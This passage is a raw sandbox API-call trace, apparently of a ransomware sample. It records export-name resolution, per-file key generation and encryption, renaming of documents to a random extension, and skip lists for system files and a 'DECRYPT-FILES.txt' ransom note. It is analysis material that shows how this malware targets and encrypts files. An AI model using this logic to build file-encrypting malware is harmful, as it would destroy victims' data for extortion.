returned 13 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.780] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.780] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.780] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.780] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.780] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.780] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.780] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.780] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.780] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.780] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.780] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.780] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.780] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.780] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.780] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv") returned 53 [0083.781] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv.fTrj") returned 58 [0083.781] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94tbqj 9i.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv.fTrj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94tbqj 9i.csv.ftrj"), dwFlags=0x0) returned 1 [0083.781] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.781] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.782] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.782] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf30610, ftCreationTime.dwHighDateTime=0x1d56fa9, ftLastAccessTime.dwLowDateTime=0xbc20e430, ftLastAccessTime.dwHighDateTime=0x1d5360b, ftLastWriteTime.dwLowDateTime=0xbc20e430, ftLastWriteTime.dwHighDateTime=0x1d5360b, nFileSizeHigh=0x0, nFileSizeLow=0x17a0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ASwb1HtgtEQdYep-2.pptx", cAlternateFileName="ASWB1H~1.PPT")) returned 1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="DECRYPT-FILES.txt") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="autorun.inf") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="boot.ini") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="desktop.ini") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="ntuser.dat") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="iconcache.db") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="bootsect.bak") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="ntuser.dat.log") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="thumbs.db") returned -1 [0083.782] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx", lpString2="Bootfont.bin") returned -1 [0083.782] lstrlenW (lpString="ASwb1HtgtEQdYep-2.pptx") returned 22 [0083.782] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0083.782] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0083.782] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0083.782] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0083.782] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.782] lstrlenW (lpString="ASwb1HtgtEQdYep-2.pptx") returned 22 [0083.782] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0083.782] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="ASwb1HtgtEQdYep-2.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx" [0083.782] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aswb1htgteqdyep-2.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.783] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=96779) returned 1 [0083.783] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.783] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.783] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.783] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.783] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.783] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.784] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.786] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.786] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.787] CloseHandle (hObject=0x414) returned 1 [0083.787] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.787] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.788] CloseHandle (hObject=0x0) returned 0 [0083.788] CloseHandle (hObject=0x410) returned 1 [0083.788] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.788] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.788] GetTickCount () returned 0x114d6a1 [0083.788] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.789] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.789] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.789] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.789] lstrlenA (lpString="kernel32.dll") returned 12 [0083.789] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.789] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.789] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.789] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.790] lstrlenA (lpString="ADDATOMA") returned 8 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.790] lstrlenA (lpString="ADDATOMW") returned 8 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.790] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.790] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.790] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.790] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.790] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.790] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.790] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.790] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.790] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.790] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.790] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.790] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.790] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.790] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.790] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.790] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.790] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.790] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.791] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.791] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.791] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.791] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.791] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.791] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.791] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.791] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.791] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.791] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.791] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.791] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.791] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.791] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.791] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.791] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.791] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.791] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.791] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.791] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.792] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.792] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.792] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.792] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.792] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.792] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.792] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.792] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.792] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.792] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.792] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.792] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.792] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.792] lstrlenA (lpString="BEEP") returned 4 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.792] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.792] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.792] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.792] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.793] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.793] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.793] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.793] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.793] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.793] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.793] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.793] lstrlenA (lpString="CANCELIO") returned 8 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.793] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.793] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.793] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.793] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.793] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.793] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.793] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") 